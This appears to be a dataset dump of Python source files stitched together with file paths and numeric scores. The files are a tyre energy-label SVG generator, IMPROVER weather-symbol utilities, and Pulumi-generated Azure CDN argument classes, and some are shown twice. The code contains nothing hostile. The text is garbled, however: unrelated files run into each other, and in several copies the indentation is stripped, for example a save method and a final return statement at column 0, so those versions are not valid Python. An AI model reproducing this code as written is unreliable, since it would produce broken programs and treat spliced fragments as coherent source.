            1: [73],
            2: [48, 124],
            3: [11, 87, 144]
        },
        'allowed_ranges': ('A', 'B', 'C', 'D', 'E')
    }

    def __init__(self, supplier: str, type_identifier: str, size: str, tyre_class: str,
                 fuel_efficiency: str, wet_grip: str, roll_noise: int, noise_level: str,
                 snow_grip: bool, ice_grip: bool, eprel_id: Optional[int] = None,
                 eprel_link: Optional[str] = None):
        """Collect the label data; grade letters are upper-cased and the
        noise level is validated against A/B/C."""
        # Prefer an explicit link; otherwise derive it from the EPREL id.
        link = eprel_link
        if link is None and eprel_id is not None:
            link = get_eprel_link(eprel_id)
        self.data = {
            'supplier': supplier,
            'type_identifier': type_identifier,
            'size': size,
            'class': tyre_class,
            'fuel_efficiency': fuel_efficiency.upper(),
            'wet_grip': wet_grip.upper(),
            'roll_noise': roll_noise,
            'noise_level': noise_level.upper(),
            'snow_grip': snow_grip,
            'ice_grip': ice_grip,
            'eprel_link': link,
            # One icon is always shown; snow/ice pictograms are optional.
            'icon_count': sum([bool(snow_grip), bool(ice_grip)]) + 1
        }
        # NOTE(review): this check runs after noise_level.upper() above, so a
        # None noise_level raises AttributeError before reaching this guard --
        # confirm whether None should be accepted.
        if noise_level and noise_level.upper() not in ('A', 'B', 'C'):
            raise ValueError(f'Invalid noise level "{noise_level}", expected A, B or C')
        self.jinja_env = Environment(loader=FileSystemLoader(ROOT_DIR / 'templates'))

    def get_qrcode(self) -> Optional[str]:
        """Return the EPREL QR code as an SVG path-element string, or None
        when no EPREL link is available."""
        if not self.data['eprel_link']:
            return None
        qr = qrcode.QRCode(
            version=1,
            error_correction=qrcode.constants.ERROR_CORRECT_M,
            box_size=11,
            border=0
        )
        qr.add_data(self.data['eprel_link'])
        qr.make(fit=True)
        img = qr.make_image(fill_color="black", back_color="white", image_factory=SvgPathImage)
        svg_path = img.make_path()
        # Serialise only the path element so it can be inlined in the template.
        return ET.tostring(svg_path, encoding='unicode')

    def as_svg(self, embed_fonts: bool = True, include_link: bool = True) -> str:
        """Render the label from the Jinja template and return the SVG text.

        Args:
            embed_fonts: whether the template should inline font data.
            include_link: whether the template should include the EPREL link.
        """
        template = self.jinja_env.get_template('label.svg.j2')
        svg = template.render(
            embed_fonts=embed_fonts,
            include_link=include_link,
            tyre=self.data,
            meta=self.META,
            qr_code=self.get_qrcode()
        )
        return svg
def save(self, filename):
with open(filename, 'w') as file:
file.write(self.as_svg()) | tyre_label/label.py | from pathlib import Path
from typing import Optional
import qrcode
from qrcode.image.svg import SvgPathImage
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
ROOT_DIR = Path(__file__).resolve().parent
def get_eprel_link(eprel_id: int) -> str:
    """Return the public EPREL QR URL for the given product registration id."""
    return f'https://eprel.ec.europa.eu/qr/{eprel_id}'
class TyreEnergyLabel:
"""
Tyre energy label generator.
Example usage:
label = TyreEnergyLabel(
supplier='Cool Tyre',
type_identifier='94385300',
size='185/75 R16',
tyre_class='C2',
fuel_efficiency='E',
wet_grip='A',
roll_noise=72,
noise_level='C',
snow_grip=True,
ice_grip=True,
eprel_id=381667,
eprel_link='https://eprel.ec.europa.eu/qr/381667'
)
label.save('example.svg')
# optional: get SVG as a string
svg_data = label.as_svg(embed_fonts=True, include_link=True)
"""
META = {
'rating_y': {'A': 38, 'B': 60, 'C': 83, 'D': 106, 'E': 128},
'icon_x': {
1: [73],
2: [48, 124],
3: [11, 87, 144]
},
'allowed_ranges': ('A', 'B', 'C', 'D', 'E')
}
def __init__(self, supplier: str, type_identifier: str, size: str, tyre_class: str,
fuel_efficiency: str, wet_grip: str, roll_noise: int, noise_level: str,
snow_grip: bool, ice_grip: bool, eprel_id: int = None, eprel_link: str = None):
link = eprel_link
if link is None and eprel_id is not None:
link = get_eprel_link(eprel_id)
self.data = {
'supplier': supplier,
'type_identifier': type_identifier,
'size': size,
'class': tyre_class,
'fuel_efficiency': fuel_efficiency.upper(),
'wet_grip': wet_grip.upper(),
'roll_noise': roll_noise,
'noise_level': noise_level.upper(),
'snow_grip': snow_grip,
'ice_grip': ice_grip,
'eprel_link': link,
'icon_count': sum([bool(snow_grip), bool(ice_grip)]) + 1
}
if noise_level and noise_level.upper() not in ('A', 'B', 'C'):
raise ValueError(f'Invalid noise level "{noise_level}", expected A, B or C')
self.jinja_env = Environment(loader=FileSystemLoader(ROOT_DIR / 'templates'))
def get_qrcode(self) -> Optional[str]:
if not self.data['eprel_link']:
return None
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_M,
box_size=11,
border=0
)
qr.add_data(self.data['eprel_link'])
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white", image_factory=SvgPathImage)
svg_path = img.make_path()
return ET.tostring(svg_path, encoding='unicode')
def as_svg(self, embed_fonts: bool = True, include_link: bool = True) -> str:
template = self.jinja_env.get_template('label.svg.j2')
svg = template.render(
embed_fonts=embed_fonts,
include_link=include_link,
tyre=self.data,
meta=self.META,
qr_code=self.get_qrcode()
)
return svg
def save(self, filename):
with open(filename, 'w') as file:
file.write(self.as_svg()) | 0.876138 | 0.341953 |
"""This module defines the utilities required for wxcode plugin """
from collections import OrderedDict
from improver.wxcode.wxcode_decision_tree import wxcode_decision_tree
from improver.wxcode.wxcode_decision_tree_global import wxcode_decision_tree_global
# Weather symbol code -> name mapping (unsorted source used to build WX_DICT).
_WX_DICT_IN = {
    0: "Clear_Night",
    1: "Sunny_Day",
    2: "Partly_Cloudy_Night",
    3: "Partly_Cloudy_Day",
    4: "Dust",
    5: "Mist",
    6: "Fog",
    7: "Cloudy",
    8: "Overcast",
    9: "Light_Shower_Night",
    10: "Light_Shower_Day",
    11: "Drizzle",
    12: "Light_Rain",
    13: "Heavy_Shower_Night",
    14: "Heavy_Shower_Day",
    15: "Heavy_Rain",
    16: "Sleet_Shower_Night",
    17: "Sleet_Shower_Day",
    18: "Sleet",
    19: "Hail_Shower_Night",
    20: "Hail_Shower_Day",
    21: "Hail",
    22: "Light_Snow_Shower_Night",
    23: "Light_Snow_Shower_Day",
    24: "Light_Snow",
    25: "Heavy_Snow_Shower_Night",
    26: "Heavy_Snow_Shower_Day",
    27: "Heavy_Snow",
    28: "Thunder_Shower_Night",
    29: "Thunder_Shower_Day",
    30: "Thunder",
}
# Canonical mapping, ordered by ascending weather code.
WX_DICT = OrderedDict(sorted(_WX_DICT_IN.items(), key=lambda t: t[0]))
# Day-time codes whose night-time variant is (code - 1), e.g. 1 (Sunny_Day)
# becomes 0 (Clear_Night); consumed by update_daynight.
DAYNIGHT_CODES = [1, 3, 10, 14, 17, 20, 23, 26, 29]
def weather_code_attributes():
    """
    Returns:
        dict:
            Attributes defining weather code meanings: a "weather_code"
            array of the codes and a space-separated "weather_code_meaning"
            string of their names.
    """
    import numpy as np  # lazy import, matching the rest of this module

    codes = np.array(list(WX_DICT.keys()))
    meanings = " ".join(WX_DICT.values())
    return {"weather_code": codes, "weather_code_meaning": meanings}
def expand_nested_lists(query, key):
    """
    Produce flat lists from list and nested lists.

    Args:
        query (dict):
            A single query from the decision tree.
        key (str):
            A string denoting the field to be taken from the dict.

    Returns:
        list:
            A 1D list containing all the values for a given key.
    """
    flattened = []
    for entry in query[key]:
        # Splice list entries in place; wrap scalars so extend is uniform.
        flattened.extend(entry if isinstance(entry, list) else [entry])
    return flattened
def update_daynight(cubewx):
    """Update weather cube depending on whether it is day or night.

    Args:
        cubewx (iris.cube.Cube):
            Cube containing only daytime weather symbols.
    Returns:
        iris.cube.Cube:
            Cube containing day and night weather symbols.
    Raises:
        CoordinateNotFoundError: cube must have time coordinate.
    """
    # Heavy dependencies imported lazily, matching the rest of this module.
    import iris
    import numpy as np
    from iris.exceptions import CoordinateNotFoundError
    import improver.utilities.solar as solar

    if not cubewx.coords("time"):
        msg = "cube must have time coordinate "
        raise CoordinateNotFoundError(msg)
    time_dim = cubewx.coord_dims("time")
    # When time is not a dimension coordinate, promote it to one so the
    # day/night mask can be applied; it is squeezed back out at the end.
    if not time_dim:
        cubewx_daynight = iris.util.new_axis(cubewx.copy(), "time")
    else:
        cubewx_daynight = cubewx.copy()
    daynightplugin = solar.DayNightMask()
    daynight_mask = daynightplugin(cubewx_daynight)
    # Loop over the codes which decrease by 1 if a night time value
    # e.g. 1 - sunny day becomes 0 - clear night.
    for val in DAYNIGHT_CODES:
        index = np.where(cubewx_daynight.data == val)
        # Where day leave as is, where night correct weather
        # code to value - 1.
        cubewx_daynight.data[index] = np.where(
            daynight_mask.data[index] == daynightplugin.day,
            cubewx_daynight.data[index],
            cubewx_daynight.data[index] - 1,
        )
    if not time_dim:
        cubewx_daynight = iris.util.squeeze(cubewx_daynight)
    return cubewx_daynight
def interrogate_decision_tree(wxtree):
    """
    Obtain a list of necessary inputs from the decision tree as it is
    currently defined. Returns a formatted string that contains the
    diagnostic names, the thresholds needed, and whether they are
    thresholded above or below these values. This output is used to create
    the CLI help, informing the user of the necessary inputs.

    Args:
        wxtree (str):
            The weather symbol tree that is to be interrogated; either
            "high_resolution" or "global".

    Returns:
        str:
            A formatted string describing the diagnostics required,
            including threshold details, one newline-terminated line per
            diagnostic.

    Raises:
        ValueError: If wxtree is not a recognised decision tree name.
    """
    # Get current weather symbol decision tree and populate a list of
    # required inputs for printing.
    if wxtree == "high_resolution":
        queries = wxcode_decision_tree()
    elif wxtree == "global":
        queries = wxcode_decision_tree_global()
    else:
        raise ValueError("Unknown decision tree name provided.")

    # Collect the unique (value, unit) thresholds required per diagnostic.
    requirements = {}
    for query in queries.values():
        diagnostics = get_parameter_names(
            expand_nested_lists(query, "diagnostic_fields")
        )
        thresholds = expand_nested_lists(query, "diagnostic_thresholds")
        for diagnostic, threshold in zip(diagnostics, thresholds):
            requirements.setdefault(diagnostic, set()).add(threshold)

    # Create a list of formatted strings that will be printed as part of the
    # CLI help.
    output = []
    for requirement, uniq_thresh in sorted(requirements.items()):
        (units,) = set(u for (_, u) in uniq_thresh)  # enforces same units
        thresh_str = ", ".join(map(str, sorted(v for (v, _) in uniq_thresh)))
        output.append("{} ({}): {}".format(requirement, units, thresh_str))

    # Join directly instead of the previous '"{}\n" * n' + str.format, which
    # produced the same text but via an avoidable format-string round trip.
    return "".join(line + "\n" for line in output)
def is_variable(thing):
    """
    Identify whether given string is likely to be a variable name by
    identifying the exceptions.

    Args:
        thing: str
            The string to operate on.

    Returns:
        bool:
            False if thing is one of ["+", "-", "*", "/"] or if
            float(thing) does not raise a ValueError, else True.
    """
    # Arithmetic operators are never variable names.
    if thing in ("+", "-", "*", "/"):
        return False
    # Anything parseable as a number is a literal, not a variable.
    try:
        float(thing)
    except ValueError:
        return True
    return False
def get_parameter_names(diagnostic_fields):
    """
    For diagnostic fields that can contain operators and values, strips out
    just the parameter names.

    Args:
        diagnostic_fields (list of lists of str):
            Field entries; nested lists are handled recursively, and
            operator / numeric tokens are dropped (see is_variable).
    Returns:
        list of lists of str
    """
    parameter_names = []
    for condition in diagnostic_fields:
        if isinstance(condition, list):
            # Recurse so the nested list structure is preserved.
            parameter_names.append(get_parameter_names(condition))
        elif is_variable(condition):
            # Keep only tokens that look like variable names.
            parameter_names.append(condition)
return parameter_names | improver/wxcode/utilities.py | """This module defines the utilities required for wxcode plugin """
from collections import OrderedDict
from improver.wxcode.wxcode_decision_tree import wxcode_decision_tree
from improver.wxcode.wxcode_decision_tree_global import wxcode_decision_tree_global
_WX_DICT_IN = {
0: "Clear_Night",
1: "Sunny_Day",
2: "Partly_Cloudy_Night",
3: "Partly_Cloudy_Day",
4: "Dust",
5: "Mist",
6: "Fog",
7: "Cloudy",
8: "Overcast",
9: "Light_Shower_Night",
10: "Light_Shower_Day",
11: "Drizzle",
12: "Light_Rain",
13: "Heavy_Shower_Night",
14: "Heavy_Shower_Day",
15: "Heavy_Rain",
16: "Sleet_Shower_Night",
17: "Sleet_Shower_Day",
18: "Sleet",
19: "Hail_Shower_Night",
20: "Hail_Shower_Day",
21: "Hail",
22: "Light_Snow_Shower_Night",
23: "Light_Snow_Shower_Day",
24: "Light_Snow",
25: "Heavy_Snow_Shower_Night",
26: "Heavy_Snow_Shower_Day",
27: "Heavy_Snow",
28: "Thunder_Shower_Night",
29: "Thunder_Shower_Day",
30: "Thunder",
}
WX_DICT = OrderedDict(sorted(_WX_DICT_IN.items(), key=lambda t: t[0]))
DAYNIGHT_CODES = [1, 3, 10, 14, 17, 20, 23, 26, 29]
def weather_code_attributes():
    """
    Returns:
        dict:
            Attributes defining weather code meanings: "weather_code" is a
            numpy array of the code numbers and "weather_code_meaning" is a
            space-separated string of the code names.
    """
    import numpy as np

    # Build the attribute dict in one literal: codes as an array, meanings
    # joined into a single space-separated string.
    return {
        "weather_code": np.array(list(WX_DICT.keys())),
        "weather_code_meaning": " ".join(WX_DICT.values()),
    }
def expand_nested_lists(query, key):
    """
    Produce flat lists from list and nested lists.

    Note: only one level of nesting is flattened; deeper lists are spliced
    in as-is.

    Args:
        query (dict):
            A single query from the decision tree.
        key (str):
            A string denoting the field to be taken from the dict.
    Returns:
        list:
            A 1D list containing all the values for a given key.
    """
    items = []
    for item in query[key]:
        if isinstance(item, list):
            items.extend(item)
        else:
            # Single value: append directly instead of extending with a
            # throwaway one-element list.
            items.append(item)
    return items
def update_daynight(cubewx):
    """Update weather cube depending on whether it is day or night.

    Args:
        cubewx(iris.cube.Cube):
            Cube containing only daytime weather symbols.
    Returns:
        iris.cube.Cube:
            Cube containing day and night weather symbols
    Raises:
        CoordinateNotFoundError : cube must have time coordinate.
    """
    import iris
    import numpy as np
    from iris.exceptions import CoordinateNotFoundError
    import improver.utilities.solar as solar

    if not cubewx.coords("time"):
        msg = "cube must have time coordinate "
        raise CoordinateNotFoundError(msg)
    time_dim = cubewx.coord_dims("time")
    # If "time" is only a scalar coordinate, promote it to a dimension so
    # the day/night mask can be computed; it is squeezed back out below.
    # The input cube is copied so the caller's cube is never mutated.
    if not time_dim:
        cubewx_daynight = iris.util.new_axis(cubewx.copy(), "time")
    else:
        cubewx_daynight = cubewx.copy()
    daynightplugin = solar.DayNightMask()
    daynight_mask = daynightplugin(cubewx_daynight)
    # Loop over the codes which decrease by 1 if a night time value
    # e.g. 1 - sunny day becomes 0 - clear night.
    for val in DAYNIGHT_CODES:
        index = np.where(cubewx_daynight.data == val)
        # Where day leave as is, where night correct weather
        # code to value - 1. Mutates cubewx_daynight.data in place.
        cubewx_daynight.data[index] = np.where(
            daynight_mask.data[index] == daynightplugin.day,
            cubewx_daynight.data[index],
            cubewx_daynight.data[index] - 1,
        )
    # Undo the temporary promotion of the scalar time coordinate.
    if not time_dim:
        cubewx_daynight = iris.util.squeeze(cubewx_daynight)
    return cubewx_daynight
def interrogate_decision_tree(wxtree):
    """
    Obtain a list of necessary inputs from the decision tree as it is currently
    defined. Return a formatted string that contains the diagnostic names, the
    thresholds needed, and whether they are thresholded above or below these
    values. This output is used to create the CLI help, informing the user of
    the necessary inputs.

    Args:
        wxtree (str):
            The weather symbol tree that is to be interrogated; one of
            "high_resolution" or "global".
    Returns:
        str:
            A formatted string describing the diagnostics required,
            including threshold details, one requirement per line.
    Raises:
        ValueError: If an unknown decision tree name is provided.
    """
    # Get current weather symbol decision tree and populate a list of
    # required inputs for printing.
    if wxtree == "high_resolution":
        queries = wxcode_decision_tree()
    elif wxtree == "global":
        queries = wxcode_decision_tree_global()
    else:
        raise ValueError("Unknown decision tree name provided.")

    # Collect the unique (value, unit) thresholds required per diagnostic.
    requirements = {}
    for query in queries.values():
        diagnostics = get_parameter_names(
            expand_nested_lists(query, "diagnostic_fields")
        )
        thresholds = expand_nested_lists(query, "diagnostic_thresholds")
        for diagnostic, threshold in zip(diagnostics, thresholds):
            requirements.setdefault(diagnostic, set()).add(threshold)

    # Create a list of formatted strings that will be printed as part of the
    # CLI help.
    output = []
    for requirement, uniq_thresh in sorted(requirements.items()):
        (units,) = set(u for (_, u) in uniq_thresh)  # enforces same units
        thresh_str = ", ".join(map(str, sorted(v for (v, _) in uniq_thresh)))
        output.append("{} ({}): {}".format(requirement, units, thresh_str))

    # One newline-terminated line per requirement; equivalent to the old
    # '"{}\n" * n_files' template trick without building a throwaway string.
    return "".join("{}\n".format(line) for line in output)
def is_variable(thing):
    """
    Identify whether a given string is likely to be a variable name by
    ruling out the exceptions.

    Args:
        thing: str
            The string to operate on
    Returns:
        bool:
            False if thing is one of ["+", "-", "*", "/"] or if float(
            thing) does not raise a ValueError, else True.
    """
    operators = ("+", "-", "*", "/")
    try:
        float(thing)
    except ValueError:
        # Non-numeric: it is a variable unless it is an operator symbol.
        return thing not in operators
    # Parsed as a number, so not a variable name.
    return False
def get_parameter_names(diagnostic_fields):
    """
    For diagnostic fields that can contain operators and values, strips out
    just the parameter names.

    Args:
        diagnostic_fields (list of lists of str):
            Entries are parameter names, operator strings, numeric strings,
            or nested lists of the same.
    Returns:
        list of lists of str
    """
    parameter_names = []
    for condition in diagnostic_fields:
        if isinstance(condition, list):
            # Recurse so the nesting structure of the input is mirrored.
            parameter_names.append(get_parameter_names(condition))
        elif is_variable(condition):
            # Operators and numeric strings are dropped here.
            parameter_names.append(condition)
    return parameter_names
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
# Public input-type surface of this generated module (star-import targets).
__all__ = [
    'CacheExpirationActionParametersArgs',
    'DeepCreatedOriginArgs',
    'DeliveryRuleCacheExpirationActionArgs',
    'DeliveryRuleUrlFileExtensionConditionArgs',
    'DeliveryRuleUrlPathConditionArgs',
    'DeliveryRuleArgs',
    'EndpointPropertiesUpdateParametersDeliveryPolicyArgs',
    'GeoFilterArgs',
    'SkuArgs',
    'UrlFileExtensionConditionParametersArgs',
    'UrlPathConditionParametersArgs',
]
@pulumi.input_type
class CacheExpirationActionParametersArgs:
    # Generated input type: structure is introspected by @pulumi.input_type,
    # so fields are stored/read via pulumi.set/pulumi.get.
    def __init__(__self__, *,
                 cache_behavior: pulumi.Input[str],
                 cache_type: pulumi.Input[str],
                 odata_type: pulumi.Input[str],
                 cache_duration: Optional[pulumi.Input[str]] = None):
        """
        Defines the parameters for the cache expiration action.
        :param pulumi.Input[str] cache_behavior: Caching behavior for the requests that include query strings.
        :param pulumi.Input[str] cache_type: The level at which the content needs to be cached.
        :param pulumi.Input[str] odata_type: OData type string; undocumented in the upstream API spec.
        :param pulumi.Input[str] cache_duration: The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
        """
        pulumi.set(__self__, "cache_behavior", cache_behavior)
        pulumi.set(__self__, "cache_type", cache_type)
        pulumi.set(__self__, "odata_type", odata_type)
        # Optional field: only stored when provided.
        if cache_duration is not None:
            pulumi.set(__self__, "cache_duration", cache_duration)

    @property
    @pulumi.getter(name="cacheBehavior")
    def cache_behavior(self) -> pulumi.Input[str]:
        """
        Caching behavior for the requests that include query strings.
        """
        return pulumi.get(self, "cache_behavior")

    @cache_behavior.setter
    def cache_behavior(self, value: pulumi.Input[str]):
        pulumi.set(self, "cache_behavior", value)

    @property
    @pulumi.getter(name="cacheType")
    def cache_type(self) -> pulumi.Input[str]:
        """
        The level at which the content needs to be cached.
        """
        return pulumi.get(self, "cache_type")

    @cache_type.setter
    def cache_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "cache_type", value)

    @property
    @pulumi.getter(name="odataType")
    def odata_type(self) -> pulumi.Input[str]:
        """
        OData type string; undocumented in the upstream API spec.
        """
        return pulumi.get(self, "odata_type")

    @odata_type.setter
    def odata_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "odata_type", value)

    @property
    @pulumi.getter(name="cacheDuration")
    def cache_duration(self) -> Optional[pulumi.Input[str]]:
        """
        The duration for which the content needs to be cached. Allowed format is [d.]hh:mm:ss
        """
        return pulumi.get(self, "cache_duration")

    @cache_duration.setter
    def cache_duration(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cache_duration", value)
@pulumi.input_type
class DeepCreatedOriginArgs:
    def __init__(__self__, *,
                 host_name: pulumi.Input[str],
                 name: pulumi.Input[str],
                 http_port: Optional[pulumi.Input[int]] = None,
                 https_port: Optional[pulumi.Input[int]] = None):
        """
        The main origin of CDN content which is added when creating a CDN endpoint.
        :param pulumi.Input[str] host_name: The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
        :param pulumi.Input[str] name: Origin name
        :param pulumi.Input[int] http_port: The value of the HTTP port. Must be between 1 and 65535
        :param pulumi.Input[int] https_port: The value of the HTTPS port. Must be between 1 and 65535
        """
        pulumi.set(__self__, "host_name", host_name)
        pulumi.set(__self__, "name", name)
        # Optional ports: only stored when provided.
        if http_port is not None:
            pulumi.set(__self__, "http_port", http_port)
        if https_port is not None:
            pulumi.set(__self__, "https_port", https_port)

    @property
    @pulumi.getter(name="hostName")
    def host_name(self) -> pulumi.Input[str]:
        """
        The address of the origin. It can be a domain name, IPv4 address, or IPv6 address.
        """
        return pulumi.get(self, "host_name")

    @host_name.setter
    def host_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "host_name", value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Origin name
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="httpPort")
    def http_port(self) -> Optional[pulumi.Input[int]]:
        """
        The value of the HTTP port. Must be between 1 and 65535
        """
        return pulumi.get(self, "http_port")

    @http_port.setter
    def http_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http_port", value)

    @property
    @pulumi.getter(name="httpsPort")
    def https_port(self) -> Optional[pulumi.Input[int]]:
        """
        The value of the HTTPS port. Must be between 1 and 65535
        """
        return pulumi.get(self, "https_port")

    @https_port.setter
    def https_port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "https_port", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
        """
        Defines the cache expiration action for the delivery rule.
        :param pulumi.Input[str] name: The name of the action for the delivery rule.
               Expected value is 'CacheExpiration'.
        :param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'CacheExpiration'.
        pulumi.set(__self__, "name", 'CacheExpiration')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the action for the delivery rule.
        Expected value is 'CacheExpiration'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
        """
        Defines the parameters for the action.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlFileExtensionConditionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
        """
        Defines the URL file extension condition for the delivery rule.
        :param pulumi.Input[str] name: The name of the condition for the delivery rule.
               Expected value is 'UrlFileExtension'.
        :param pulumi.Input['UrlFileExtensionConditionParametersArgs'] parameters: Defines the parameters for the condition.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'UrlFileExtension'.
        pulumi.set(__self__, "name", 'UrlFileExtension')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the condition for the delivery rule.
        Expected value is 'UrlFileExtension'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['UrlFileExtensionConditionParametersArgs']:
        """
        Defines the parameters for the condition.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['UrlFileExtensionConditionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleUrlPathConditionArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 parameters: pulumi.Input['UrlPathConditionParametersArgs']):
        """
        Defines the URL path condition for the delivery rule.
        :param pulumi.Input[str] name: The name of the condition for the delivery rule.
               Expected value is 'UrlPath'.
        :param pulumi.Input['UrlPathConditionParametersArgs'] parameters: Defines the parameters for the condition.
        """
        # The passed-in `name` is deliberately ignored: this type always
        # stores the fixed discriminator value 'UrlPath'.
        pulumi.set(__self__, "name", 'UrlPath')
        pulumi.set(__self__, "parameters", parameters)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the condition for the delivery rule.
        Expected value is 'UrlPath'.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def parameters(self) -> pulumi.Input['UrlPathConditionParametersArgs']:
        """
        Defines the parameters for the condition.
        """
        return pulumi.get(self, "parameters")

    @parameters.setter
    def parameters(self, value: pulumi.Input['UrlPathConditionParametersArgs']):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleArgs:
    def __init__(__self__, *,
                 actions: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]],
                 order: pulumi.Input[int],
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]] = None):
        """
        A rule that specifies a set of actions and conditions
        :param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]] actions: A list of actions that are executed when all the conditions of a rule are satisfied.
        :param pulumi.Input[int] order: The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
        :param pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]] conditions: A list of conditions that must be matched for the actions to be executed
        """
        pulumi.set(__self__, "actions", actions)
        pulumi.set(__self__, "order", order)
        # Optional field: only stored when provided.
        if conditions is not None:
            pulumi.set(__self__, "conditions", conditions)

    @property
    @pulumi.getter
    def actions(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]:
        """
        A list of actions that are executed when all the conditions of a rule are satisfied.
        """
        return pulumi.get(self, "actions")

    @actions.setter
    def actions(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleCacheExpirationActionArgs']]]):
        pulumi.set(self, "actions", value)

    @property
    @pulumi.getter
    def order(self) -> pulumi.Input[int]:
        """
        The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
        """
        return pulumi.get(self, "order")

    @order.setter
    def order(self, value: pulumi.Input[int]):
        pulumi.set(self, "order", value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]:
        """
        A list of conditions that must be matched for the actions to be executed
        """
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]):
        pulumi.set(self, "conditions", value)
@pulumi.input_type
class EndpointPropertiesUpdateParametersDeliveryPolicyArgs:
    def __init__(__self__, *,
                 rules: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]],
                 description: Optional[pulumi.Input[str]] = None):
        """
        A policy that specifies the delivery rules to be used for an endpoint.
        :param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]] rules: A list of the delivery rules.
        :param pulumi.Input[str] description: User-friendly description of the policy.
        """
        pulumi.set(__self__, "rules", rules)
        # Optional field: only stored when provided.
        if description is not None:
            pulumi.set(__self__, "description", description)

    @property
    @pulumi.getter
    def rules(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]:
        """
        A list of the delivery rules.
        """
        return pulumi.get(self, "rules")

    @rules.setter
    def rules(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]):
        pulumi.set(self, "rules", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        User-friendly description of the policy.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
@pulumi.input_type
class GeoFilterArgs:
    def __init__(__self__, *,
                 action: pulumi.Input['GeoFilterActions'],
                 country_codes: pulumi.Input[Sequence[pulumi.Input[str]]],
                 relative_path: pulumi.Input[str]):
        """
        Rules defining user's geo access within a CDN endpoint.
        :param pulumi.Input['GeoFilterActions'] action: Action of the geo filter, i.e. allow or block access.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] country_codes: Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
        :param pulumi.Input[str] relative_path: Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
        """
        pulumi.set(__self__, "action", action)
        pulumi.set(__self__, "country_codes", country_codes)
        pulumi.set(__self__, "relative_path", relative_path)

    @property
    @pulumi.getter
